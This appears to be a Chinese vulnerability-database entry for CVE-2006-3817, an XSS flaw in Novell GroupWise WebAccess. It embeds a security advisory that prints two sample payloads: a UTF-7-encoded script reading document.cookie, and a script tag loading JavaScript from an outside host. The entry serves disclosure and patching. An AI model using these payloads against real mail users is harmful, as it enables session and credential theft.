CVE-2006-3817
CVSS4.3
发布时间 :2006-08-11 06:04:00
修订时间 :2011-03-07 21:39:32
NMCOPS    

[原文]Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence.


[CNNVD]Novell GroupWise WebAccess 和Novell GroupWise WebAccess 跨站脚本攻击(XSS)漏洞(CNNVD-200608-189)

        20060727之前的Novell GroupWise WebAccess 6.5和Novell GroupWise WebAccess 7版本中具有跨站脚本攻击(XSS)漏洞,远程攻击者可借助带有UTF-7字符集的邮件消息中的编码SCRIPT元素来注入任意web脚本或HTML,如通过"+ADw-SCRIPT+AD4-"序列。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:novell:groupwise_webaccess:7Novell GroupWise WebAccess 7
cpe:/a:novell:groupwise_webaccess:6.5:sp4
cpe:/a:novell:groupwise_webaccess:6.5:sp3
cpe:/a:novell:groupwise_webaccess:6.5:sp2
cpe:/a:novell:groupwise_webaccess:6.5Novell GroupWise WebAccess 6.5
cpe:/a:novell:groupwise_webaccess:6.5:sp1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3817
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3817
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-189
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/28211
(PATCH)  XF  groupwise-utf7-xss(28211)
http://www.novell.com/support/search.do?cmd=displayKC&externalId=3701584&sliceId=SAL_Public
(PATCH)  CONFIRM  http://www.novell.com/support/search.do?cmd=displayKC&externalId=3701584&sliceId=SAL_Public
http://www.infobyte.com.ar/adv/ISR-14.html
(PATCH)  MISC  http://www.infobyte.com.ar/adv/ISR-14.html
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974176.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974176.htm
http://secunia.com/advisories/21411
(VENDOR_ADVISORY)  SECUNIA  21411
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048593.html
(PATCH)  FULLDISC  20060808 [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)
http://www.vupen.com/english/advisories/2006/3098
(UNKNOWN)  VUPEN  ADV-2006-3098
http://www.securityfocus.com/bid/19297
(UNKNOWN)  BID  19297
http://www.securityfocus.com/archive/1/archive/1/442719/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060808 [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)
http://securitytracker.com/id?1016648
(UNKNOWN)  SECTRACK  1016648

- 漏洞信息

Novell GroupWise WebAccess 和Novell GroupWise WebAccess 跨站脚本攻击(XSS)漏洞
中危 跨站脚本
2006-08-11 00:00:00 2006-08-14 00:00:00
远程  
        20060727之前的Novell GroupWise WebAccess 6.5和Novell GroupWise WebAccess 7版本中具有跨站脚本攻击(XSS)漏洞,远程攻击者可借助带有UTF-7字符集的邮件消息中的编码SCRIPT元素来注入任意web脚本或HTML,如通过"+ADw-SCRIPT+AD4-"序列。

- 公告与补丁

        

- 漏洞信息 (F49122)

ISR-novellxss.txt (PacketStormID:F49122)
2006-08-18 00:00:00
Francisco Amato  infobyte.com.ar
advisory,xss
CVE-2006-3817
[点击下载]

Novell Groupwise WebAccess is susceptible to cross site scripting attacks. Versions 7 and 6.5 are susceptible.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

:: 
 :: [ISR]
 :: Infobyte Security Research 
 :: www.infobyte.com.ar
 :: 08.08.2006 
::


.:: SUMMARY

Novell Groupwise WebAccess Cross-Site Scripting

Version: Novell GroupWise WebAccess 7, 6.5
It is suspected that all previous versions of Groupwise WebAccess are
vulnerable.

.:: BACKGROUND

GroupWise WebAccess is Novell's premier Intranet/Internet GroupWare
solution for the Web.

More info:    http://www.novell.com

.:: DESCRIPTION

Remote explotation of Cross-Site Scripting due to failure of the
application to properly
sanitize user-supplied input prior to including it in dynamically generated
Web content.

Example 1:
- - ---------
Description: The filter of Groupwise doesn't check UTF-7 encondig.
Sending an email with the following html code we can execute javascript
code in the context of authenticated user browser. 

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
+ADw-SCRIPT+AD4-alert(document.cookie);+ADw-/SCRIPT+AD4-
</html> 


Example 2:
- - ---------
Description: The filter of Groupwise doesn't sanitize the following code

<html>
<SCRIPT/XSS SRC="http://www.infobyte.com.ar/xss/xss.js"></SCRIPT>
<<SCRIPT><</SCRIPT> 
</html>

It show a simple codes of examples to execute script in the browser of an
unsuspecting user.
These issues may allow for the theft of authentication credentials.

.:: VENDOR RESPONSE

Vendor advisory:
   
"http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalI
d=3701584&sliceId=SAL_Public&dialogID=8568328&stateId=0 0 8572233"

Vendor patch:
    Hot Patch for GroupWise 7:
http://support.novell.com/filefinder/20641/beta.html
    Field Test File for GroupWise 6.5:
http://support.novell.com/filefinder/16963/beta.html
    
.:: CVE INFORMATION

Id: CVE-2006-3817
Web: http://cve.mitre.org
    
.:: DISCLOSURE TIMELINE

05/26/2006  Initial vendor notification
05/26/2006  Initial vendor response
07/31/2005  Coordinated public disclosure

.:: CREDIT

Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar

.:: ADVISORY

http://www.infobyte.com.ar/adv/ISR-14.html

.:: LEGAL NOTICES

Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not 
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically 
requires permission from infobyte com ar

Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing 
based on currently available information. Use of the information
constitutes acceptance 
for use in an AS IS condition. There are no warranties with regard to this
information. 
Neither the author nor the publisher accepts any liability for any direct,
indirect, or 
consequential loss or damage arising from use of, or reliance on, this
information.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.6 (Build 6060)

iQA/AwUBRNjnr3s2oPjapNRZEQL2PACdG+dBRMiOzRJU+uGmd12yzBKpxo8AoL65
wNMwLcHW71e5bBcwrAvyg8Xh
=jVVp
-----END PGP SIGNATURE-----

    

- 漏洞信息

27818
Novell GroupWise WebAccess UTF-7 Encoded Message XSS
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-31 2006-05-26
2006-07-31 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Novell GroupWise Multiple HTML Injection Scripting Vulnerabilities
Input Validation Error 19297
Yes No
2006-07-28 12:00:00 2006-09-05 10:43:00
Jerome Odegaard and Francisco Amato are credited with the discovery of these vulnerabilities.

- 受影响的程序版本

Novell Groupwise 6.5.4
Novell Groupwise 6.5.3
Novell Groupwise 6.5.2
Novell Groupwise 6.5 SP6 Update 1
Novell Groupwise 6.5 SP6
Novell Groupwise 6.5 SP5
Novell Groupwise 6.5 SP4
Novell Groupwise 6.5 SP3
Novell Groupwise 6.5 SP2
Novell Groupwise 6.5 SP1
Novell Groupwise 6.5
Novell Groupwise 6.0 SP4
Novell Groupwise 6.0 SP3
Novell Groupwise 6.0 SP2
Novell Groupwise 6.0 SP1
Novell Groupwise 6.0
Novell Groupwise 6.5 Post SP6

- 不受影响的程序版本

Novell Groupwise 6.5 Post SP6

- 漏洞讨论

Novell GroupWise is prone to multiple HTML-injection vulnerabilities.

These issues occur because the application fails to sanitize user-input before using dynamically generated content.

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

- 漏洞利用

Attackers can exploit this issue via a web client.

- 解决方案

The vendor has released updates to address these issues. Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站